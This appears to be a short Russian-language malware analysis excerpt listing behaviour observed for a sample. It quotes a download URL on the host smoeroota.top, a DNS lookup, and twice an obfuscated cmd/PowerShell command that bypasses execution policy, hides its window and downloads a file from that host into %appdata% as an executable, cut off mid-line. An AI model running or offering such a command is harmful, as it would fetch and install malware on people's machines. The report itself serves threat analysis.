Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwersh^eLl^.exe -E^xEc^ut^ionP^Oli^C^y^ B^yPAS^s -nop^ro^FilE^ -WI^N^dow^s^TY^lE HI^Dde^n (new-objE^cT s^ystEM^.N^ET^.W^eb^clI^EN^T^)^.DowN^LoadF^ILe^(^'http://smoeroota.top/rea...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "pOwersh^eLl^.exe -E^xEc^ut^ionP^Oli^C^y^ B^yPAS^s -nop^ro^FilE^ -WI^N^dow^s^TY^lE HI^Dde^n (new-objE^cT s^ystEM^.N^ET^.W^eb^clI^EN^T^)^.DowN^LoadF^ILe^(^'http://smoeroota.top/rea...' (со скрытым окном)